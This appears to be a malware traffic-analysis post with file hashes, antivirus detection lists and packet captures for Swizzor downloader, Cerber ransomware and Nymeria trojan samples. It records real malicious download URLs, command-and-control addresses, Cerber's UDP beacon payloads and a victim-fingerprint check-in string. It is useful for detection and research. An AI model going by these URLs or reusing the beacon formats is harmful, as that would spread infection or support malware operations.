Swizzor Malware Trojan Downloader Dropper r6.php?cmd=e PCAP file Download Traffic Analysis Sample

SHA256: e94e398e06ea23be9866db444773c1ca16edb0e6042e51878442a4991c17cf4b
File name: r6.exe
Detection ratio: 19 / 62
Analysis date: 2017-07-06 02:12:20 UTC
AegisLab Mal.Swizzor.Gen!c 20170706
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9997 20170705
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170420
Endgame malicious (high confidence) 20170629
ESET-NOD32 a variant of Win32/Kryptik.FUEK 20170705
Invincea heuristic 20170607
Kaspersky UDS:DangerousObject.Multi.Generic 20170705
McAfee Artemis!081AC2E55C35 20170706
McAfee-GW-Edition BehavesLike.Win32.Dropper.gh 20170705
Qihoo-360 HEUR/QVM10.1.4A81.Malware.Gen 20170706
Rising Trojan.Kryptik!8.8 (cloud:qqKhnl05I8F) 20170706
SentinelOne (Static ML) static engine - malicious 20170516
Sophos Mal/Gozi-C 20170705
Symantec ML.Attribute.HighConfidence 20170705
Tencent Win32.Trojan.Swizzor.Dla 20170706
TrendMicro Mal_Swizzor 20170706
TrendMicro-HouseCall Mal_Swizzor 20170706

2017-07-05 16:38:45.795048 IP 192.168.1.102.50327 > 192.168.1.100.55555: Flags [P.], seq 1:438, ack 1, win 2053, length 437
GET /r6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://192.168.1.100:55555/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100:55555
Connection: Keep-Alive

2017-07-05 16:38:45.795076 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], ack 438, win 237, length 0
2017-07-05 16:38:45.795363 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], seq 1:5841, ack 438, win 237, length 5840
HTTP/1.1 200 OK
Date: Wed, 05 Jul 2017 20:38:45 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Wed, 05 Jul 2017 20:19:12 GMT
ETag: "79000-55397b6a51939"
Accept-Ranges: bytes
Content-Length: 495616
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

2017-07-05 16:40:46.672264 IP 192.168.1.102.50328 > 50.87.37.56.80: Flags [P.], seq 2021661667:2021661880, ack 1680714260, win 256, length 213: HTTP: GET /modules/pm/class/Hdkfk.zip HTTP/1.1
GET /modules/pm/class/Hdkfk.zip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: lebabillart.com

2017-07-05 16:41:46.995591 IP 192.168.1.102.50415 > 37.48.122.26.80: Flags [P.], seq 3572951193:3572951377, ack 3206900573, win 256, length 184: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: curlmyip.net

2017-07-05 16:40:53.778871 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 1028276613:1028276858, ack 2829810775, win 256, length 245: HTTP
[TLS ClientHello, SNI: www.r4qr7kaimymhqpkeohxqwk6ma.com]
2017-07-05 16:40:53.929880 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 245:379, ack 1011, win 252, length 134: HTTP

[TLS ClientHello SNI: www.btpv.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:40:59.807137 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 224:358, ack 755, win 253, length 134: HTTP
2017-07-05 16:40:59.912870 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 358:432, ack 814, win 253, length 74: HTTP

[TLS ClientHello SNI: www.vsgg3.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:01.272209 IP 192.168.1.102.50344 > 89.166.109.22.9001: Flags [P.], seq 3688677451:3688677696, ack 2907826683, win 256, length 245
[TLS ClientHello, SNI: www.3bf6dju2v7wvcd2tdwc7xuyjz.com]
2017-07-05 16:41:01.272587 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 590545619:590545845, ack 2885913782, win 256, length 226
[TLS ClientHello, SNI: www.z6trd5.com]
2017-07-05 16:41:01.272960 IP 192.168.1.102.50346 > 79.172.193.32.443: Flags [P.], seq 3271176865:3271177105, ack 393248132, win 256, length 240
[TLS ClientHello, SNI: www.ti5cggc3w6fh6qkggygt.com]
2017-07-05 16:41:01.273351 IP 192.168.1.102.50347 > 144.76.91.135.9001: Flags [P.], seq 4092234089:4092234329, ack 1379166419, win 256, length 240
[TLS ClientHello, SNI: www.oi44tlwdjouche27j6uk.com]
2017-07-05 16:41:01.273760 IP 192.168.1.102.50348 > 193.11.114.45.9002: Flags [P.], seq 32464236:32464468, ack 1167986777, win 256, length 232
[TLS ClientHello, SNI: www.jfn2xgmrvbtv.com]

2017-07-05 16:41:01.275969 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 3057837041:3057837274, ack 656463986, win 256, length 233
[TLS ClientHello, SNI: www.kw3lbndwebwz3.com]
2017-07-05 16:41:01.276371 IP 192.168.1.102.50355 > 159.203.32.149.443: Flags [P.], seq 3989707829:3989708070, ack 851698541, win 256, length 241
[TLS ClientHello, SNI: www.tb3xh2ild426zjbyax5ml.com]
2017-07-05 16:41:01.276729 IP 192.168.1.102.50356 > 138.201.247.2.61001: Flags [P.], seq 1140788138:1140788371, ack 498199005, win 256, length 233
[TLS ClientHello, SNI: www.vsn57bxc3mb2o.com]
2017-07-05 16:41:01.277127 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1708854068:1708854308, ack 2197240829, win 256, length 240
[TLS ClientHello, SNI: www.6jedagsxg3mrdwiddka7.com]
2017-07-05 16:41:01.277578 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 3813650108:3813650348, ack 2006550589, win 256, length 240
[TLS ClientHello, SNI: www.ihinmgwvwlruzfro7o44.com]
2017-07-05 16:41:01.277964 IP 192.168.1.102.50333 > 78.46.51.124.443: Flags [P.], seq 3319424194:3319424434, ack 3060906392, win 256, length 240
[TLS ClientHello, SNI: www.evtxd72nmocj47moklbg.com]
2017-07-05 16:41:01.278632 IP 192.168.1.102.50334 > 83.168.200.204.80: Flags [P.], seq 2944603737:2944603981, ack 689799960, win 256, length 244: HTTP
[TLS ClientHello, SNI: www.irygrdulouqccdt2bf27xymd.com]
2017-07-05 16:41:01.279174 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 1410216554:1410216799, ack 244719982, win 258, length 245
[TLS ClientHello, SNI: www.aak45gn42iiiixiph5ekrkj7j.com]
2017-07-05 16:41:01.279566 IP 192.168.1.102.50336 > 78.47.18.110.80: Flags [P.], seq 3503629744:3503629982, ack 1339106153, win 256, length 238: HTTP
[TLS ClientHello, SNI: www.6di5z3rikdmc6fzplr.com]
2017-07-05 16:41:01.279935 IP 192.168.1.102.50337 > 94.100.6.27.443: Flags [P.], seq 399576572:399576812, ack 3647675222, win 260, length 240
[TLS ClientHello, SNI: www.642l5nfdken6ng6khuvd.com]
2017-07-05 16:41:01.280372 IP 192.168.1.102.50338 > 37.235.55.83.443: Flags [P.], seq 1010240698:1010240936, ack 667920148, win 260, length 238
[TLS ClientHello, SNI: www.2yc2podezduls5a2hc.com]

2017-07-05 16:41:01.318500 IP 192.168.1.102.50341 > 62.78.245.129.9001: Flags [P.], seq 2340612092:2340612331, ack 167635855, win 256, length 239
[TLS ClientHello, SNI: www.7gb7wwcxdddw2y72xka.com]
2017-07-05 16:41:01.318813 IP 192.168.1.102.50342 > 46.41.130.68.443: Flags [P.], seq 2491986743:2491986984, ack 1654762805, win 256, length 241
[TLS ClientHello, SNI: www.5deqfvyuplq76nmo5kygv.com]
2017-07-05 16:41:01.319307 IP 192.168.1.102.50358 > 138.197.133.81.443: Flags [P.], seq 841677261:841677487, ack 4217093403, win 256, length 226
[TLS ClientHello, SNI: www.3qkvdr.com]
2017-07-05 16:41:01.334877 IP 192.168.1.102.50360 > 212.47.239.163.12001: Flags [P.], seq 3227276382:3227276607, ack 3713232475, win 256, length 225
[TLS ClientHello, SNI: www.nw6ah.com]
2017-07-05 16:41:01.349150 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 1969936195:1969936430, ack 66593790, win 256, length 235
[TLS ClientHello, SNI: www.6rg6elubllem6ie.com]
2017-07-05 16:41:01.349597 IP 192.168.1.102.50361 > 147.135.210.101.443: Flags [P.], seq 894183362:894183591, ack 38755765, win 256, length 229
[TLS ClientHello, SNI: www.tzlpgwndi.com]
2017-07-05 16:41:01.368468 IP 192.168.1.102.50350 > 158.69.92.127.443: Flags [P.], seq 225:359, ack 749, win 253, length 134

[TLS ClientHello SNI: www.nuhwpyyd6nfnkq3v5uy.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:01.374806 IP 192.168.1.102.50359 > 195.16.89.145.938: Flags [P.], seq 1471468849:1471469074, ack 3395312164, win 256, length 225
[TLS ClientHello, SNI: www.a7vt5.com]
2017-07-05 16:41:01.399201 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 233:367, ack 750, win 253, length 134
2017-07-05 16:41:01.404277 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 226:360, ack 1007, win 252, length 134

[TLS ClientHello SNI: www.h3ahgcxy6qbyhzkao.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:01.806750 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 443:1029, ack 2331, win 256, length 586

[TLS ClientHello SNI: www.exzjuqdla2zuht.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:01.839503 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 1034:1620, ack 2380, win 256, length 586

[TLS ClientHello SNI: www.qj5nowel4s7gpeeh.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:01.863714 IP 192.168.1.102.50362 > 89.163.128.59.443: Flags [P.], seq 447:1033, ack 2350, win 256, length 586
2017-07-05 16:41:01.869640 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1034:1620, ack 2358, win 256, length 586

[TLS ClientHello SNI: www.qmkzzyzjz.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:02.068335 IP 192.168.1.102.50367 > 88.198.148.255.443: Flags [P.], seq 3425834539:3425834780, ack 2791446585, win 256, length 241
[TLS ClientHello, SNI: www.qkeo5fjh7odaex53nrzo7.com]
2017-07-05 16:41:02.068537 IP 192.168.1.102.50365 > 144.217.87.78.9001: Flags [P.], seq 1617:2203, ack 2967, win 254, length 586

[TLS ClientHello SNI: www.oshw5kihq7h6m.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:02.302916 IP 192.168.1.102.50369 > 5.39.33.176.9001: Flags [P.], seq 1333368373:1333368606, ack 523297106, win 256, length 233
[TLS ClientHello, SNI: www.2ivry2rhlsedt.com]
2017-07-05 16:41:02.302932 IP 192.168.1.102.50377 > 208.80.154.39.9002: Flags [P.], seq 3909397981:3909398212, ack 1235496428, win 256, length 231
[TLS ClientHello, SNI: www.g34wync2gay.com]
2017-07-05 16:41:02.302936 IP 192.168.1.102.50374 > 88.99.68.246.9001: Flags [P.], seq 2809581064:2809581295, ack 3172681866, win 256, length 231
[TLS ClientHello, SNI: www.24wsxlew22o.com]
2017-07-05 16:41:02.302941 IP 192.168.1.102.50376 > 212.47.245.76.9001: Flags [P.], seq 3503728016:3503728254, ack 3139782477, win 256, length 238
[TLS ClientHello, SNI: www.fres4kxhkdbq4zkuon.com]
2017-07-05 16:41:02.302947 IP 192.168.1.102.50370 > 185.73.220.8.443: Flags [P.], seq 2951769582:2951769824, ack 2938571099, win 260, length 242
[TLS ClientHello, SNI: www.nlxzuet4sn2w4e4hj4xufw.com]
2017-07-05 16:41:02.302951 IP 192.168.1.102.50373 > 179.43.168.166.443: Flags [P.], seq 1204194106:1204194345, ack 3572972556, win 260, length 239
[TLS ClientHello, SNI: www.sjoqaev4ide4zrf2hap.com]
2017-07-05 16:41:02.302954 IP 192.168.1.102.50371 > 80.238.122.106.9001: Flags [P.], seq 1823198598:1823198825, ack 679601301, win 256, length 227
[TLS ClientHello, SNI: www.smqzyif.com]
2017-07-05 16:41:02.302991 IP 192.168.1.102.50375 > 178.62.66.18.9001: Flags [P.], seq 3599510712:3599510955, ack 2206526366, win 256, length 243
[TLS ClientHello, SNI: www.uje4qre7zeih6zxcnmpehhq.com]
2017-07-05 16:41:02.302995 IP 192.168.1.102.50372 > 185.14.28.216.22: Flags [P.], seq 420702787:420703027, ack 2486638856, win 256, length 240
[TLS ClientHello, SNI: www.aftox7fcxtwy5vfx3m7c.com]
2017-07-05 16:41:02.303000 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 6967:7553, ack 31517, win 256, length 586

[TLS ClientHello SNI: www.x76fxmp6synvp4olcnf.com (the ClientHello's summary line is not in the dump)]
2017-07-05 16:41:02.345468 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 12156:12742, ack 42950, win 256, length 586

[TLS ClientHello SNI: www.qmkzzyzjz.com (the ClientHello's summary line is not in the dump)]

========================= DNS REQUESTS =================================

2017-07-05 16:40:46.246003 IP 192.168.1.102.53471 > 75.75.75.75.53: 3090+ A? lebabillart.com. (33)
2017-07-05 16:41:46.683380 IP 192.168.1.102.53472 > 75.75.75.75.53: 44790+ A? resolver1.opendns.com. (39)
2017-07-05 16:41:46.740625 IP 192.168.1.102.53473 > 75.75.75.75.53: 5628+ A? curlmyip.net. (30)
2017-07-05 16:41:46.790071 IP 192.168.1.102.53474 > 208.67.222.222.53: 1+ PTR? 222.222.67.208.in-addr.arpa. (45)
2017-07-05 16:41:46.830077 IP 192.168.1.102.53475 > 208.67.222.222.53: 2+ A? myip.opendns.com.localdomain. (46)
2017-07-05 16:41:46.860243 IP 192.168.1.102.53476 > 208.67.222.222.53: 3+ AAAA? myip.opendns.com.localdomain. (46)
2017-07-05 16:41:46.898746 IP 192.168.1.102.53477 > 208.67.222.222.53: 4+ A? myip.opendns.com. (34)
2017-07-05 16:41:46.940960 IP 192.168.1.102.53478 > 208.67.222.222.53: 5+ AAAA? myip.opendns.com. (34)
2017-07-05 16:41:59.775454 IP 192.168.1.102.65176 > 75.75.75.75.53: 29311+ A? ipcast1.dynupdate.noip.com. (44)
2017-07-05 16:42:14.298395 IP 192.168.1.102.53348 > 75.75.75.75.53: 54941+ A? client.wns.windows.com. (40)
2017-07-05 16:42:14.316391 IP 192.168.1.102.53348 > 75.75.76.76.53: 54941+ A? client.wns.windows.com. (40)
2017-07-05 16:42:14.576805 IP 192.168.1.102.61411 > 75.75.75.75.53: 10302+ A? BN4SCH101122406.wns.windows.com. (49)
2017-07-05 16:43:23.899661 IP 192.168.1.102.61412 > 75.75.75.75.53: 54931+ A? dns.msftncsi.com. (34)
2017-07-05 16:43:23.916411 IP 192.168.1.102.61413 > 75.75.75.75.53: 2211+ AAAA? dns.msftncsi.com. (34)
2017-07-05 16:45:02.659817 IP 192.168.1.102.59548 > 75.75.75.75.53: 8336+ A? evoke-windowsservices-tas.msedge.net. (54)

Cerber Ransomware Malware Crimeware 77.12.57.x 87.98.176.x PCAP txt File Download Traffic Sample

SHA256: 3929550c9f06e66ccf15aca4808fc9e2f21ee14e343a29ac1b3232e402364c57
File name: 1
Detection ratio: 21 / 61
Analysis date: 2017-07-03 22:43:32 UTC
AhnLab-V3 Trojan/Win32.Cerber.C2028306 20170703
Avast Win32:Malware-gen 20170703
AVG Win32:Malware-gen 20170703
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170703
Bkav HW32.Packed.4068 20170703
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20170420
Cyren W32/Cerber.F.gen!Eldorado 20170703
DrWeb Trojan.Siggen7.24571 20170703
Emsisoft Trojan-Ransom.Cerber (A) 20170703
Endgame malicious (high confidence) 20170629
ESET-NOD32 a variant of Win32/GenKryptik.AMYN 20170703
F-Prot W32/Cerber.F.gen!Eldorado 20170703
Invincea heuristic 20170607
McAfee Ransomware-GAQ!4F796AC47AB1 20170703
Qihoo-360 HEUR/QVM20.1.3E97.Malware.Gen 20170703
Rising Trojan.Kryptik!1.AACA (classic) 20170703
SentinelOne (Static ML) static engine - malicious 20170516
Symantec Ransom.Cerber 20170703
TrendMicro Ransom_HPCERBER.SMALY5A 20170703

2017-07-03 15:56:12.852094 IP 192.168.1.102.60671 > 103.52.216.15.80: Flags [P.], seq 0:387, ack 1, win 261, length 387: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: dbvopeoo.top
Connection: Keep-Alive

2017-07-03 15:56:36.340777 IP 192.168.1.102.50642 > 77.12.57.0.6893: UDP, length 25
2017-07-03 15:56:36.340860 IP 192.168.1.102.50642 > 77.12.57.1.6893: UDP, length 25
2017-07-03 15:56:36.340916 IP 192.168.1.102.50642 > 77.12.57.2.6893: UDP, length 25
2017-07-03 15:56:36.340921 IP 192.168.1.102.50642 > 77.12.57.3.6893: UDP, length 25
2017-07-03 15:56:36.340968 IP 192.168.1.102.50642 > 77.12.57.4.6893: UDP, length 25
2017-07-03 15:56:36.341039 IP 192.168.1.102.50642 > 77.12.57.5.6893: UDP, length 25
2017-07-03 15:56:36.341043 IP 192.168.1.102.50642 > 77.12.57.6.6893: UDP, length 25
2017-07-03 15:56:36.341112 IP 192.168.1.102.50642 > 77.12.57.7.6893: UDP, length 25
2017-07-03 15:56:36.341164 IP 192.168.1.102.50642 > 77.12.57.8.6893: UDP, length 25
2017-07-03 15:56:36.341169 IP 192.168.1.102.50642 > 77.12.57.9.6893: UDP, length 25
2017-07-03 15:56:36.341216 IP 192.168.1.102.50642 > 77.12.57.10.6893: UDP, length 25
2017-07-03 15:56:36.341289 IP 192.168.1.102.50642 > 77.12.57.11.6893: UDP, length 25
2017-07-03 15:56:36.341294 IP 192.168.1.102.50642 > 77.12.57.12.6893: UDP, length 25
2017-07-03 15:56:36.341372 IP 192.168.1.102.50642 > 77.12.57.13.6893: UDP, length 25
2017-07-03 15:56:36.341423 IP 192.168.1.102.50642 > 77.12.57.14.6893: UDP, length 25
2017-07-03 15:56:36.341523 IP 192.168.1.102.50642 > 77.12.57.15.6893: UDP, length 25
2017-07-03 15:56:36.341527 IP 192.168.1.102.50642 > 77.12.57.16.6893: UDP, length 25
2017-07-03 15:56:36.341606 IP 192.168.1.102.50642 > 77.12.57.17.6893: UDP, length 25
2017-07-03 15:56:36.341610 IP 192.168.1.102.50642 > 77.12.57.18.6893: UDP, length 25
2017-07-03 15:56:36.341701 IP 192.168.1.102.50642 > 77.12.57.19.6893: UDP, length 25
2017-07-03 15:56:36.341705 IP 192.168.1.102.50642 > 77.12.57.20.6893: UDP, length 25
2017-07-03 15:56:36.341779 IP 192.168.1.102.50642 > 77.12.57.21.6893: UDP, length 25
2017-07-03 15:56:36.341829 IP 192.168.1.102.50642 > 77.12.57.22.6893: UDP, length 25
2017-07-03 15:56:36.341833 IP 192.168.1.102.50642 > 77.12.57.23.6893: UDP, length 25
2017-07-03 15:56:36.341884 IP 192.168.1.102.50642 > 77.12.57.24.6893: UDP, length 25
2017-07-03 15:56:36.341950 IP 192.168.1.102.50642 > 77.12.57.25.6893: UDP, length 25
UDP payload, identical in each of the 26 datagrams above: 5d250b9731550098970000073

2017-07-03 15:56:42.788139 IP 192.168.1.102.50643 > 87.98.176.53.6893: UDP, length 14
2017-07-03 15:56:42.788228 IP 192.168.1.102.50643 > 87.98.176.54.6893: UDP, length 14
2017-07-03 15:56:42.788391 IP 192.168.1.102.50643 > 87.98.176.55.6893: UDP, length 14
2017-07-03 15:56:42.788441 IP 192.168.1.102.50643 > 87.98.176.56.6893: UDP, length 14
2017-07-03 15:56:42.788497 IP 192.168.1.102.50643 > 87.98.176.57.6893: UDP, length 14
2017-07-03 15:56:42.788589 IP 192.168.1.102.50643 > 87.98.176.58.6893: UDP, length 14
2017-07-03 15:56:42.788696 IP 192.168.1.102.50643 > 87.98.176.59.6893: UDP, length 14
2017-07-03 15:56:42.788898 IP 192.168.1.102.50643 > 87.98.176.60.6893: UDP, length 14
2017-07-03 15:56:42.788973 IP 192.168.1.102.50643 > 87.98.176.61.6893: UDP, length 14
2017-07-03 15:56:42.789068 IP 192.168.1.102.50643 > 87.98.176.62.6893: UDP, length 14
2017-07-03 15:56:42.789429 IP 192.168.1.102.50643 > 87.98.176.63.6893: UDP, length 14
2017-07-03 15:56:42.789620 IP 192.168.1.102.50643 > 87.98.176.64.6893: UDP, length 14
2017-07-03 15:56:42.789738 IP 192.168.1.102.50643 > 87.98.176.65.6893: UDP, length 14
2017-07-03 15:56:42.789935 IP 192.168.1.102.50643 > 87.98.176.66.6893: UDP, length 14
2017-07-03 15:56:42.789991 IP 192.168.1.102.50643 > 87.98.176.67.6893: UDP, length 14
2017-07-03 15:56:42.789995 IP 192.168.1.102.50643 > 87.98.176.68.6893: UDP, length 14
2017-07-03 15:56:42.790091 IP 192.168.1.102.50643 > 87.98.176.69.6893: UDP, length 14
2017-07-03 15:56:42.790251 IP 192.168.1.102.50643 > 87.98.176.70.6893: UDP, length 14
2017-07-03 15:56:42.790311 IP 192.168.1.102.50643 > 87.98.176.71.6893: UDP, length 14
2017-07-03 15:56:42.790363 IP 192.168.1.102.50643 > 87.98.176.72.6893: UDP, length 14
UDP payload, identical in each of the 20 datagrams above: 5d250b973155ab

Nymeria Trojan Malware AURVIA.exe 213.183.58.9.1981 WannaCry SMB MS17-010 EternalBlue PCAP txt File Traffic Sample Download

SHA256: 61a28dba92fb1dc8bebec84115c934e1eb1b7643b49cf10667a943e819c811ae
File name: AURVIA.exe
Detection ratio: 45 / 61
Analysis date: 2017-07-03 20:28:12 UTC
Ad-Aware AIT:Trojan.Nymeria.109 20170703
AegisLab Troj.W32.Autoit.lZhY 20170703
AhnLab-V3 Trojan/Win32.AutoIt.C2019675 20170703
ALYac AIT:Trojan.Nymeria.109 20170703
Arcabit AIT:Trojan.Nymeria.109 20170703
Avast Win32:Malware-gen 20170703
AVG Win32:Malware-gen 20170703
Avira (no cloud) TR/Worm.ztzxx 20170703
AVware Trojan.Win32.Generic!BT 20170703
BitDefender AIT:Trojan.Nymeria.109 20170703
CMC Trojan.Win32.Generic!O 20170701
Comodo TrojWare.Spy.Autoit.~ 20170703
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170420
Cyren W32/Trojan.ULQS-9254 20170703
DrWeb Trojan.MulDrop7.31019 20170703
Emsisoft AIT:Trojan.Nymeria.109 (B) 20170703

2017-07-03 15:42:43.109898 IP 192.168.1.102.60633 > 176.9.21.114.80: Flags [P.], seq 0:407, ack 1, win 256, length 407: HTTP: GET /morgan/AURVIA.exe HTTP/1.1
GET /morgan/AURVIA.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: wearitgroups.com
Connection: Keep-Alive

2017-07-03 15:43:02.388661 IP 192.168.1.102.64250 > 75.75.75.75.53: 1813+ A? ip-score.com. (30)
2017-07-03 15:43:02.592822 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [S], seq 4247852493, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:43:02.732962 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 920389231, win 256, length 0
2017-07-03 15:43:02.740348 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [P.], seq 0:66, ack 1, win 256, length 66: HTTP: GET /checkip/ HTTP/1.1
GET /checkip/ HTTP/1.1
User-Agent: AutoIt
Host: ip-score.com

2017-07-03 15:43:03.150845 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 7143, win 256, length 0
2017-07-03 15:43:03.152347 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 10056, win 256, length 0
2017-07-03 15:43:03.699652 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [S], seq 3725019290, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:43:06.704436 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [S], seq 3725019290, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:43:07.063193 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 1238798603, win 260, length 0
2017-07-03 15:43:07.065901 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [P.], seq 0:86, ack 1, win 260, length 86
United States|TTTTT3|76.111.8.85|blahhost|WIN_7|X86|No|No|1.0.1|ddd|Pr1080X21920X3|x|beta
2017-07-03 15:43:07.274722 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [P.], seq 0:86, ack 1, win 260, length 86
E..~Q.@……..f..:    ……H.I…P…….United States|TTTTT3|76.111.8.85|blahhost|WIN_7|X86|No|No|1.0.1|ddd|Pr1080X21920X3|x|beta
2017-07-03 15:43:11.664823 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 6, win 260, length 0
E..(Q.@……..f..:    ……H.I…P………….
2017-07-03 15:43:16.661934 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 11, win 260, length 0
E..(Q.@……..f..:    ……H.I…P………….
2017-07-03 15:43:21.674695 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 16, win 260, length 0
E..(Q.@……..f..:    ……H.I…P….~……..
2017-07-03 15:43:26.686897 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 21, win 260, length 0
E..(Q.@……..f..:    ……H.I…P….y……..
2017-07-03 15:43:30.683093 IP 192.168.1.102.137 > 192.168.1.112.137: NBT UDP PACKET(137): QUERY; POSITIVE; RESPONSE; UNICAST
E..fy…..<….f…p…..R…?………. FCFJDEFHEOCNFAEDCACACACACACACACA.. ……..`…..`…..`….f
2017-07-03 15:43:30.686265 IP 192.168.1.102.5355 > 192.168.1.112.59508: UDP, length 50
E..Ny…..<….f…p…t.:.I………….blahhost-PC……blahhost-PC…………..f
2017-07-03 15:43:30.686353 IP 192.168.1.102.5355 > 192.168.1.112.50550: UDP, length 62
E..Zy…..<….f…p…v.F|…………..blahhost-PC……blahhost-PC……………………..&
2017-07-03 15:43:30.694290 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [S.], seq 714103385, ack 3128129811, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4y.@……..f…p…S*.ZY.sy… .B……………
2017-07-03 15:43:30.701319 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1:5, ack 73, win 256, length 4 NBT Session Packet: Session Granted
E..,y.@……..f…p…S*.ZZ.sy[P…     ……..
2017-07-03 15:43:30.703165 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 5:414, ack 210, win 256, length 409 NBT Session Packet: Session Message
E…y.@….Q…f…p…S*.Z^.sy.P…kg…….SMBr…..C…………………….
………………….L4……P..%…..O…
.l!.`..<..+……..00..,..0..
+…..7….
+…..7..
……..NEGOEXTS……..`…p……..:..).4.V..n…z…P…..G….=.t{…N…$.?……..`……………\3S….M..J.xn..NEGOEXTS……..@…………:..).4.V..n\3S….M..J.xn..@…X…0V.T0R0′.%0#1!0…U….Token Signing Public Key0′.%0#1!0…U….Token Signing Public Key
2017-07-03 15:43:30.705940 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 414:744, ack 352, win 255, length 330 NBT Session Packet: Session Message
E..ry.@……..f…p…S*.[..szrP….X…..F.SMBs…………………………F……….0….
…..
+…..7..
……NTLMSSP………8…….ij.9$.H………`.`.H…
.98….R.Y.4.W.N.-.P.C…..R.Y.4.W.N.-.P.C…..R.Y.4.W.N.-.P.C…..r.y.4.w.n.-.P.C…..r.y.4.w.n.-.P.C……..L4…….W.i.n.d.o.w.s. .1.0. .H.o.m.e. .1.4.3.9.3…W.i.n.d.o.w.s. .1.0. .H.o.m.e. .6…3…
2017-07-03 15:43:30.709358 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 744:904, ack 592, win 254, length 160 NBT Session Packet: Session Message
E…y.@….H…f…p…S*.]A.s{bP…………SMBs……………………. ……….q…0…
…………d….;….W.i.n.d.o.w.s. .1.0. .H.o.m.e. .1.4.3.9.3…W.i.n.d.o.w.s. .1.0. .H.o.m.e. .6…3…
2017-07-03 15:43:30.712507 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 904:964, ack 678, win 254, length 60 NBT Session Packet: Session Message
